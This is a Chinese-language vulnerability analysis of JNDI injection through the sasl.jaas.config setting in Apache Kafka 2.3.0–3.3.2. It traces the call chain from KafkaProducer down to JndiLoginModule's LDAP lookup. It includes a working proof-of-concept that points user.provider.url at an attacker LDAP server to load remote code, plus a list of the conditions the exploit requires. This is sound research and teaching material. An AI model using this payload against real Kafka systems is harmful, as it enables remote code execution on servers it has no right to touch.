Kafka是最初由Linkedin公司开发,是一个分布式、支持分区的(partition)、多副本的(replica),基于zookeeper协调的分布式消息系统,它的最大的特性就是可以实时的处理大量数据以满足各种需求场景:比如基于hadoop的批处理系统、低延迟的实时系统、storm/Spark流式处理引擎,web/nginx日志、访问日志,消息服务等等,用scala语言编写,Linkedin于2010年贡献给了Apache基金会并成为顶级开源项目。
Kafka是由Apache软件基金会开发的一个开源流处理平台,由Scala和Java编写。该项目的目标是为处理实时数据提供一个统一、高吞吐、低延迟的平台。其持久化层本质上是一个“按照分布式事务日志架构的大规模发布/订阅消息队列”,这使它作为企业级基础设施来处理流式数据非常有价值。
此漏洞允许服务器连接到攻击者的 LDAP 服务器并反序列化 LDAP 响应,攻击者可以使用它在 Kafka 连接服务器上执行 java 反序列化小工具链。当类路径中有小工具时,攻击者可以造成不可信数据的无限制反序列化(或)RCE 漏洞。
此漏洞利用的前提是:需要访问 Kafka Connect worker,并能够使用任意 Kafka 客户端 SASL JAAS 配置和基于 SASL 的安全协议在其上创建/修改连接器。 自 Apache Kafka 2.3.0 以来,这在 Kafka Connect 集群上是可能的。 通过 Kafka Connect REST API 配置连接器时,经过身份验证的操作员可以将连接器的任何 Kafka 客户端的 sasl.jaas.config
属性设置为“com.sun.security.auth.module.JndiLoginModule”,它可以是通过“producer.override.sasl.jaas.config”,“consumer.override.sasl.jaas.config”或“admin.override.sasl.jaas.config”属性完成。
Apache Kafka 2.3.0 - 3.3.2
<dependency>
<groupId>org.apache.kafka</groupId>
<artifactId>kafka-clients</artifactId>
<version>3.3.0</version>
</dependency>
public static void main(String[] args) {
//高版本JDK(jdk8_191以上)需设置此才可通过ldap进行JNDI注入,低版本JDK不影响
//高版本科配合JNDI高版本绕过方式
System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
Properties props = new Properties();
props.put("security.protocol","SASL_SSL");
props.put("sasl.jaas.config","com.sun.security.auth.module.JndiLoginModule " +
"required user.provider.url=\"ldap://192.168.0.104:1389/Basic/Command/calc\" " +
"useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" " +
"group.provider.url=\"xxx\";");
props.put("bootstrap.servers", "localhost:9092");
props.put("key.serializer", "org.apache.kafka.common.serialization.StringSerializer");
props.put("value.serializer", "org.apache.kafka.common.serialization.StringSerializer");
Producer<String, String> producer = new KafkaProducer<>(props);
}
调试跟进方法
org.apache.kafka.clients.producer.KafkaProducer构造方法
//3、调用至此构造方法3
public KafkaProducer(Map<String, Object> configs, Serializer<K> keySerializer, Serializer<V> valueSerializer) {
this(new ProducerConfig(ProducerConfig.appendSerializerToConfig(configs, keySerializer, valueSerializer)), keySerializer, valueSerializer, (ProducerMetadata)null, (KafkaClient)null, (ProducerInterceptors)null, Time.SYSTEM);
}
//1、调用此构造方法1
public KafkaProducer(Properties properties) {
this((Properties)properties, (Serializer)null, (Serializer)null);
}
//2、调用至此构造方法2
public KafkaProducer(Properties properties, Serializer<K> keySerializer, Serializer<V> valueSerializer) {
this(Utils.propsToMap(properties), keySerializer, valueSerializer);
}
//4、最终调用至此构造方法4
KafkaProducer(ProducerConfig config, Serializer<K> keySerializer, Serializer<V> valueSerializer, ProducerMetadata metadata, KafkaClient kafkaClient, ProducerInterceptors<K, V> interceptors, Time time) {
try {
//以下皆为赋值操作
this.producerConfig = config;
this.time = time;
String transactionalId = config.getString("transactional.id");
this.clientId = config.getString("client.id");
LogContext logContext;
if (transactionalId == null) {
logContext = new LogContext(String.format("[Producer clientId=%s] ", this.clientId));
} else {
logContext = new LogContext(String.format("[Producer clientId=%s, transactionalId=%s] ", this.clientId, transactionalId));
}
......
this.errors = this.metrics.sensor("errors");
//调用newSender()方法
this.sender = this.newSender(logContext, kafkaClient, this.metadata);
String ioThreadName = "kafka-producer-network-thread | " + this.clientId;
this.ioThread = new KafkaThread(ioThreadName, this.sender, true);
this.ioThread.start();
config.logUnused();
AppInfoParser.registerAppInfo("kafka.producer", this.clientId, this.metrics, time.milliseconds());
this.log.debug("Kafka producer started");
} catch (Throwable var24) {
this.close(Duration.ofMillis(0L), true);
throw new KafkaException("Failed to construct kafka producer", var24);
}
}
调用构造方法1
直至调用至构造方法4
org.apache.kafka.clients.producer.KafkaProducer#newSender()
Sender newSender(LogContext logContext, KafkaClient kafkaClient, ProducerMetadata metadata) {
int maxInflightRequests = this.producerConfig.getInt("max.in.flight.requests.per.connection");
int requestTimeoutMs = this.producerConfig.getInt("request.timeout.ms");
//调用至ClientUtils#createChannelBuilder()
ChannelBuilder channelBuilder = ClientUtils.createChannelBuilder(this.producerConfig, this.time, logContext);
ProducerMetrics metricsRegistry = new ProducerMetrics(this.metrics);
Sensor throttleTimeSensor = Sender.throttleTimeSensor(metricsRegistry.senderMetrics);
KafkaClient client = kafkaClient != null ? kafkaClient : new NetworkClient(new Selector(this.producerConfig.getLong("connections.max.idle.ms"), this.metrics, this.time, "producer", channelBuilder, logContext), metadata, this.clientId, maxInflightRequests, this.producerConfig.getLong("reconnect.backoff.ms"), this.producerConfig.getLong("reconnect.backoff.max.ms"), this.producerConfig.getInt("send.buffer.bytes"), this.producerConfig.getInt("receive.buffer.bytes"), requestTimeoutMs, this.producerConfig.getLong("socket.connection.setup.timeout.ms"), this.producerConfig.getLong("socket.connection.setup.timeout.max.ms"), this.time, true, this.apiVersions, throttleTimeSensor, logContext);
short acks = Short.parseShort(this.producerConfig.getString("acks"));
return new Sender(logContext, (KafkaClient)client, metadata, this.accumulator, maxInflightRequests == 1, this.producerConfig.getInt("max.request.size"), acks, this.producerConfig.getInt("retries"), metricsRegistry.senderMetrics, this.time, requestTimeoutMs, this.producerConfig.getLong("retry.backoff.ms"), this.transactionManager, this.apiVersions);
}
org.apache.kafka.clients.ClientUtils#createChannelBuilder()
public static ChannelBuilder createChannelBuilder(AbstractConfig config, Time time, LogContext logContext) {
//securityProtocol值为之前security.protocol设置值
SecurityProtocol securityProtocol = SecurityProtocol.forName(config.getString("security.protocol"));
String clientSaslMechanism = config.getString("sasl.mechanism");
//调用至ChannelBuilders#clientChannelBuilder()
return ChannelBuilders.clientChannelBuilder(securityProtocol, Type.CLIENT, config, (ListenerName)null, clientSaslMechanism, time, true, logContext);
}之前security.protocol
org.apache.kafka.common.network.ChannelBuilders#clientChannelBuilder()
public static ChannelBuilder clientChannelBuilder(SecurityProtocol securityProtocol, JaasContext.Type contextType, AbstractConfig config, ListenerName listenerName, String clientSaslMechanism, Time time, boolean saslHandshakeRequestEnable, LogContext logContext) {
if (securityProtocol == SecurityProtocol.SASL_PLAINTEXT || securityProtocol == SecurityProtocol.SASL_SSL) {
//contextType不为空,不进入
if (contextType == null) {
throw new IllegalArgumentException("`contextType` must be non-null if `securityProtocol` is `" + securityProtocol + "`");
}
//clientSaslMechanism不为空,不进入
if (clientSaslMechanism == null) {
throw new IllegalArgumentException("`clientSaslMechanism` must be non-null in client mode if `securityProtocol` is `" + securityProtocol + "`");
}
}
//调用至ChannelBuilders#create()
return create(securityProtocol, Mode.CLIENT, contextType, config, listenerName, false, clientSaslMechanism, saslHandshakeRequestEnable, (CredentialCache)null, (DelegationTokenCache)null, time, logContext, (Supplier)null);
}
org.apache.kafka.common.network.ChannelBuilders#create()
private static ChannelBuilder create(SecurityProtocol securityProtocol, Mode mode, JaasContext.Type contextType, AbstractConfig config, ListenerName listenerName, boolean isInterBrokerListener, String clientSaslMechanism, boolean saslHandshakeRequestEnable, CredentialCache credentialCache, DelegationTokenCache tokenCache, Time time, LogContext logContext, Supplier<ApiVersionsResponse> apiVersionSupplier) {
Map<String, Object> configs = channelBuilderConfigs(config, listenerName);
Object channelBuilder;
//securityProtocol为传入security.protocol值
switch (securityProtocol) {
//security.protocol值为SSL进入
case SSL:
requireNonNullMode(mode, securityProtocol);
channelBuilder = new SslChannelBuilder(mode, listenerName, isInterBrokerListener, logContext);
break;
//security.protocol值为SASL_SSL、SASL_PLAINTEXT进入
case SASL_SSL:
case SASL_PLAINTEXT:
requireNonNullMode(mode, securityProtocol);
String sslClientAuthOverride = null;
Object jaasContexts;
//mode默认为CLIENT进入
if (mode != Mode.SERVER) {
JaasContext jaasContext = contextType == Type.CLIENT ? JaasContext.loadClientContext(configs) : JaasContext.loadServerContext(listenerName, clientSaslMechanism, configs);
jaasContexts = Collections.singletonMap(clientSaslMechanism, jaasContext);
//else默认不进入
} else {
List<String> enabledMechanisms = (List)configs.get("sasl.enabled.mechanisms");
jaasContexts = new HashMap(enabledMechanisms.size());
Iterator var18 = enabledMechanisms.iterator();
String listenerClientAuth;
while(var18.hasNext()) {
listenerClientAuth = (String)var18.next();
((Map)jaasContexts).put(listenerClientAuth, JaasContext.loadServerContext(listenerName, listenerClientAuth, configs));
}
if (listenerName != null && securityProtocol == SecurityProtocol.SASL_SSL) {
String configuredClientAuth = (String)configs.get("ssl.client.auth");
listenerClientAuth = (String)config.originalsWithPrefix(listenerName.configPrefix(), true).get("ssl.client.auth");
if (listenerClientAuth == null) {
sslClientAuthOverride = SslClientAuth.NONE.name().toLowerCase(Locale.ROOT);
if (configuredClientAuth != null && !configuredClientAuth.equalsIgnoreCase(SslClientAuth.NONE.name())) {
log.warn("Broker configuration '{}' is applied only to SSL listeners. Listener-prefixed configuration can be used to enable SSL client authentication for SASL_SSL listeners. In future releases, broker-wide option without listener prefix may be applied to SASL_SSL listeners as well. All configuration options intended for specific listeners should be listener-prefixed.", "ssl.client.auth");
}
}
}
}
//channelBuilder为SaslChannelBuilder
channelBuilder = new SaslChannelBuilder(mode, (Map)jaasContexts, securityProtocol, listenerName, isInterBrokerListener, clientSaslMechanism, saslHandshakeRequestEnable, credentialCache, tokenCache, sslClientAuthOverride, time, logContext, apiVersionSupplier);
break;
//security.protocol值为PLAINTEXT进入
case PLAINTEXT:
channelBuilder = new PlaintextChannelBuilder(listenerName);
break;
//security.protocol值不为以上值进入
default:
throw new IllegalArgumentException("Unexpected securityProtocol " + securityProtocol);
}
//调用channelBuilder).configure()
//当security.protocol值为SSL channelBuilder为SslChannelBuilder类
//当security.protocol值为SASL_SSL、SASL_PLAINTEXT channelBuilder为SaslChannelBuilder类
//当security.protocol值不为以上值 channelBuilder为IllegalArgumentException类
((ChannelBuilder)channelBuilder).configure(configs);
return (ChannelBuilder)channelBuilder;
}
org.apache.kafka.common.network.SaslChannelBuilder#configure()
public void configure(Map<String, ?> configs) throws KafkaException {
try {
......
while(var12.hasNext()) {
Map.Entry<String, JaasContext> entry = (Map.Entry)var12.next();
String mechanism = (String)entry.getKey();
//调用至LoginManager#acquireLoginManager()
LoginManager loginManager = LoginManager.acquireLoginManager((JaasContext)entry.getValue(), mechanism, defaultLoginClass, configs);
this.loginManagers.put(mechanism, loginManager);
Subject subject = loginManager.subject();
this.subjects.put(mechanism, subject);
if (this.mode == Mode.SERVER && mechanism.equals("GSSAPI")) {
this.maybeAddNativeGssapiCredentials(subject);
}
}
if (this.securityProtocol == SecurityProtocol.SASL_SSL) {
this.sslFactory = new SslFactory(this.mode, this.sslClientAuthOverride, this.isInterBrokerListener);
this.sslFactory.configure(configs);
}
} catch (Throwable var9) {
this.close();
throw new KafkaException(var9);
}
}
org.apache.kafka.common.security.authenticator.LoginManager#acquireLoginManager()
public static LoginManager acquireLoginManager(JaasContext jaasContext, String saslMechanism, Class<? extends Login> defaultLoginClass, Map<String, ?> configs) throws LoginException {
Class<? extends Login> loginClass = configuredClassOrDefault(configs, jaasContext, saslMechanism, "sasl.login.class", defaultLoginClass);
Class<? extends AuthenticateCallbackHandler> defaultLoginCallbackHandlerClass = "OAUTHBEARER".equals(saslMechanism) ? OAuthBearerUnsecuredLoginCallbackHandler.class : AbstractLogin.DefaultLoginCallbackHandler.class;
Class<? extends AuthenticateCallbackHandler> loginCallbackClass = configuredClassOrDefault(configs, jaasContext, saslMechanism, "sasl.login.callback.handler.class", defaultLoginCallbackHandlerClass);
Class var7 = LoginManager.class;
synchronized(LoginManager.class) {
Password jaasConfigValue = jaasContext.dynamicJaasConfig();
LoginManager loginManager;
LoginMetadata loginMetadata;
//jaasConfigValue为传入sasl.jaas.config值,不为空
if (jaasConfigValue != null) {
loginMetadata = new LoginMetadata(jaasConfigValue, loginClass, loginCallbackClass);
loginManager = (LoginManager)DYNAMIC_INSTANCES.get(loginMetadata);
//loginManager默认为空
if (loginManager == null) {
//new LoginManager()
loginManager = new LoginManager(jaasContext, saslMechanism, configs, loginMetadata);
DYNAMIC_INSTANCES.put(loginMetadata, loginManager);
}
} else {
loginMetadata = new LoginMetadata(jaasContext.name(), loginClass, loginCallbackClass);
loginManager = (LoginManager)STATIC_INSTANCES.get(loginMetadata);
if (loginManager == null) {
loginManager = new LoginManager(jaasContext, saslMechanism, configs, loginMetadata);
STATIC_INSTANCES.put(loginMetadata, loginManager);
}
}
SecurityUtils.addConfiguredSecurityProviders(configs);
return loginManager.acquire();
}
}
org.apache.kafka.common.security.authenticator.LoginManager构造方法
private LoginManager(JaasContext jaasContext, String saslMechanism, Map<String, ?> configs, LoginMetadata<?> loginMetadata) throws LoginException {
this.loginMetadata = loginMetadata;
this.login = (Login)Utils.newInstance(loginMetadata.loginClass);
this.loginCallbackHandler = (AuthenticateCallbackHandler)Utils.newInstance(loginMetadata.loginCallbackClass);
this.loginCallbackHandler.configure(configs, saslMechanism, jaasContext.configurationEntries());
this.login.configure(configs, jaasContext.name(), jaasContext.configuration(), this.loginCallbackHandler);
//调用至login()
this.login.login();
}
org.apache.kafka.common.security.kerberos.KerberosLogin#login()
public LoginContext login() throws LoginException {
this.lastLogin = this.currentElapsedTime();
//调用其父类AbstractLogin#login()
this.loginContext = super.login();
this.subject = this.loginContext.getSubject();
this.isKrbTicket = !this.subject.getPrivateCredentials(KerberosTicket.class).isEmpty();
AppConfigurationEntry[] entries = this.configuration().getAppConfigurationEntry(this.contextName());
if (entries.length == 0) {
this.isUsingTicketCache = false;
this.principal = null;
} else {
...
}
...
org.apache.kafka.common.security.authenticator.AbstractLogin#login()
public LoginContext login() throws LoginException {
//声明LoginContext
this.loginContext = new LoginContext(this.contextName, (Subject)null, this.loginCallbackHandler, this.configuration);
//调用LoginContext#login()
this.loginContext.login();
log.info("Successfully logged in.");
return this.loginContext;
}
javax.security.auth.login.LoginContext#login()
public void login() throws LoginException {
loginSucceeded = false;
if (subject == null) {
subject = new Subject();
}
try {
// module invoked in doPrivileged
//LOGIN_METHOD为为login
invokePriv(LOGIN_METHOD);
invokePriv(COMMIT_METHOD);
loginSucceeded = true;
} catch (LoginException le) {
try {
invokePriv(ABORT_METHOD);
} catch (LoginException le2) {
throw le;
}
throw le;
}
}
javax.security.auth.login.LoginContext#invokePriv()
private void invokePriv(final String methodName) throws LoginException {
try {
java.security.AccessController.doPrivileged
(new java.security.PrivilegedExceptionAction<Void>() {
public Void run() throws LoginException {
invoke(methodName);
return null;
}
}, creatorAcc);
} catch (java.security.PrivilegedActionException pae) {
throw (LoginException)pae.getException();
}
}
javax.security.auth.login.LoginContext#invoke()
private void invoke(String methodName) throws LoginException {
// start at moduleIndex
// - this can only be non-zero if methodName is LOGIN_METHOD
for (int i = moduleIndex; i < moduleStack.length; i++, moduleIndex++) {
try {
int mIndex = 0;
Method[] methods = null;
if (moduleStack[i].module != null) {
methods = moduleStack[i].module.getClass().getMethods();
} else {
// instantiate the LoginModule
//
// Allow any object to be a LoginModule as long as it
// conforms to the interface.
Class<?> c = Class.forName(
moduleStack[i].entry.getLoginModuleName(),
true,
contextClassLoader);
Constructor<?> constructor = c.getConstructor(PARAMS);
Object[] args = { };
moduleStack[i].module = constructor.newInstance(args);
// call the LoginModule's initialize method
methods = moduleStack[i].module.getClass().getMethods();
for (mIndex = 0; mIndex < methods.length; mIndex++) {
if (methods[mIndex].getName().equals(INIT_METHOD)) {
break;
}
}
Object[] initArgs = {subject,
callbackHandler,
state,
moduleStack[i].entry.getOptions() };
// invoke the LoginModule initialize method
//
// Throws ArrayIndexOutOfBoundsException if no such
// method defined. May improve to use LoginException in
// the future.
//invoke调用
methods[mIndex].invoke(moduleStack[i].module, initArgs);
}
// find the requested method in the LoginModule
for (mIndex = 0; mIndex < methods.length; mIndex++) {
if (methods[mIndex].getName().equals(methodName)) {
break;
}
}
// set up the arguments to be passed to the LoginModule method
Object[] args = { };
// invoke the LoginModule method
//
// Throws ArrayIndexOutOfBoundsException if no such
// method defined. May improve to use LoginException in
// the future.
boolean status = ((Boolean)methods[mIndex].invoke
(moduleStack[i].module, args)).booleanValue();
if (status == true) {
// if SUFFICIENT, return if no prior REQUIRED errors
if (!methodName.equals(ABORT_METHOD) &&
!methodName.equals(LOGOUT_METHOD) &&
moduleStack[i].entry.getControlFlag() ==
AppConfigurationEntry.LoginModuleControlFlag.SUFFICIENT &&
firstRequiredError == null) {
// clear state
clearState();
if (debug != null)
debug.println(methodName + " SUFFICIENT success");
return;
}
if (debug != null)
debug.println(methodName + " success");
success = true;
} else {
if (debug != null)
debug.println(methodName + " ignored");
}
} catch (NoSuchMethodException nsme) {
MessageFormat form = new MessageFormat(ResourcesMgr.getString
("unable.to.instantiate.LoginModule.module.because.it.does.not.provide.a.no.argument.constructor"));
Object[] source = {moduleStack[i].entry.getLoginModuleName()};
throwException(null, new LoginException(form.format(source)));
} catch (InstantiationException ie) {
throwException(null, new LoginException(ResourcesMgr.getString
("unable.to.instantiate.LoginModule.") +
ie.getMessage()));
} catch (ClassNotFoundException cnfe) {
throwException(null, new LoginException(ResourcesMgr.getString
("unable.to.find.LoginModule.class.") +
cnfe.getMessage()));
} catch (IllegalAccessException iae) {
throwException(null, new LoginException(ResourcesMgr.getString
("unable.to.access.LoginModule.") +
iae.getMessage()));
} catch (InvocationTargetException ite) {
// failure cases
LoginException le;
if (ite.getCause() instanceof PendingException &&
methodName.equals(LOGIN_METHOD)) {
// XXX
//
// if a module's LOGIN_METHOD threw a PendingException
// then immediately throw it.
//
// when LoginContext is called again,
// the module that threw the exception is invoked first
// (the module list is not invoked from the start).
// previously thrown exception state is still present.
//
// it is assumed that the module which threw
// the exception can have its
// LOGIN_METHOD invoked twice in a row
// without any commit/abort in between.
//
// in all cases when LoginContext returns
// (either via natural return or by throwing an exception)
// we need to call clearState before returning.
// the only time that is not true is in this case -
// do not call throwException here.
throw (PendingException)ite.getCause();
} else if (ite.getCause() instanceof LoginException) {
le = (LoginException)ite.getCause();
} else if (ite.getCause() instanceof SecurityException) {
// do not want privacy leak
// (e.g., sensitive file path in exception msg)
le = new LoginException("Security Exception");
le.initCause(new SecurityException());
if (debug != null) {
debug.println
("original security exception with detail msg " +
"replaced by new exception with empty detail msg");
debug.println("original security exception: " +
ite.getCause().toString());
}
} else {
// capture an unexpected LoginModule exception
java.io.StringWriter sw = new java.io.StringWriter();
ite.getCause().printStackTrace
(new java.io.PrintWriter(sw));
sw.flush();
le = new LoginException(sw.toString());
}
if (moduleStack[i].entry.getControlFlag() ==
AppConfigurationEntry.LoginModuleControlFlag.REQUISITE) {
if (debug != null)
debug.println(methodName + " REQUISITE failure");
// if REQUISITE, then immediately throw an exception
if (methodName.equals(ABORT_METHOD) ||
methodName.equals(LOGOUT_METHOD)) {
if (firstRequiredError == null)
firstRequiredError = le;
} else {
throwException(firstRequiredError, le);
}
} else if (moduleStack[i].entry.getControlFlag() ==
AppConfigurationEntry.LoginModuleControlFlag.REQUIRED) {
if (debug != null)
debug.println(methodName + " REQUIRED failure");
// mark down that a REQUIRED module failed
if (firstRequiredError == null)
firstRequiredError = le;
} else {
if (debug != null)
debug.println(methodName + " OPTIONAL failure");
// mark down that an OPTIONAL module failed
if (firstError == null)
firstError = le;
}
}
}
// we went thru all the LoginModules.
if (firstRequiredError != null) {
// a REQUIRED module failed -- return the error
throwException(firstRequiredError, null);
} else if (success == false && firstError != null) {
// no module succeeded -- return the first error
throwException(firstError, null);
} else if (success == false) {
// no module succeeded -- all modules were IGNORED
throwException(new LoginException
(ResourcesMgr.getString("Login.Failure.all.modules.ignored")),
null);
} else {
// success
clearState();
return;
}
}
com.sun.security.auth.module#login()
public boolean login() throws LoginException {
//userProvider不能为空
if (userProvider不能为空 == null) {
throw new LoginException
("Error: Unable to locate JNDI user provider");
}
//groupProvider不能为空
if (groupProvider == null) {
throw new LoginException
("Error: Unable to locate JNDI group provider");
}
if (debug) {
System.out.println("\t\t[JndiLoginModule] user provider: " +
userProvider);
System.out.println("\t\t[JndiLoginModule] group provider: " +
groupProvider);
}
// attempt the authentication
//tryFirstPass为true进入
if (tryFirstPass) {
try {
// attempt the authentication by getting the
// username and password from shared state
//存在JNDI注入
attemptAuthentication(true);
// authentication succeeded
succeeded = true;
if (debug) {
System.out.println("\t\t[JndiLoginModule] " +
"tryFirstPass succeeded");
}
return true;
} catch (LoginException le) {
// authentication failed -- try again below by prompting
cleanState();
if (debug) {
System.out.println("\t\t[JndiLoginModule] " +
"tryFirstPass failed with:" +
le.toString());
}
}
//useFirstPass为true
} else if (useFirstPass) {
try {
// attempt the authentication by getting the
// username and password from shared state
//存在JNDI注入
attemptAuthentication(true);
// authentication succeeded
succeeded = true;
if (debug) {
System.out.println("\t\t[JndiLoginModule] " +
"useFirstPass succeeded");
}
return true;
} catch (LoginException le) {
// authentication failed
cleanState();
if (debug) {
System.out.println("\t\t[JndiLoginModule] " +
"useFirstPass failed");
}
throw le;
}
}
// attempt the authentication by prompting for the username and pwd
try {
attemptAuthentication(false);
// authentication succeeded
succeeded = true;
if (debug) {
System.out.println("\t\t[JndiLoginModule] " +
"regular authentication succeeded");
}
return true;
} catch (LoginException le) {
cleanState();
if (debug) {
System.out.println("\t\t[JndiLoginModule] " +
"regular authentication failed");
}
throw le;
}
}
com.sun.security.auth.module#attemptAuthentication()
private void attemptAuthentication(boolean getPasswdFromSharedState)
throws LoginException {
String encryptedPassword = null;
// first get the username and password
//若getPasswdFromSharedState为true代码进行运行,若为false则进入catch,不存在JNDI注入
getUsernamePassword(getPasswdFromSharedState);
try {
// get the user's passwd entry from the user provider URL
InitialContext iCtx = new InitialContext();
//JNDI注入
ctx = (DirContext)iCtx.lookup(userProvider);
SearchControls controls = new SearchControls();
NamingEnumeration<SearchResult> ne = ctx.search("",
"(uid=" + username + ")",
controls);
if (ne.hasMore()) {
SearchResult result = ne.next();
Attributes attributes = result.getAttributes();
....
}
调用链如下:
综上若进行JNDI注入需满足一下条件:
//security.protocol为SASL_SSL SASL_PLAINTEXT
props.put("security.protocol","SASL_SSL");
bootstrap.servers不为空,为空解析报错
props.put("bootstrap.servers", "localhost:9092");
key.serializer不为空,且可被解析
props.put("key.serializer", "org.apache.kafka.common.serialization.StringSerializer");
value.serializer不为空,且可被解析
props.put("value.serializer", "org.apache.kafka.common.serialization.StringSerializer");
//sasl.jaas.config为com.sun.security.auth.module.JndiLoginModule最终invoke至此类login()方法
//useFirstPass或tryFirstPass为true
//serviceName不为空
//group.provider.url不为空
//required user.provider.url为JNDI注入恶意地址
props.put("sasl.jaas.config","com.sun.security.auth.module.JndiLoginModule " +
"required user.provider.url=\"ldap://192.168.0.104:1389/Basic/Command/calc\" " +
"useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" " +
"group.provider.url=\"xxx\";");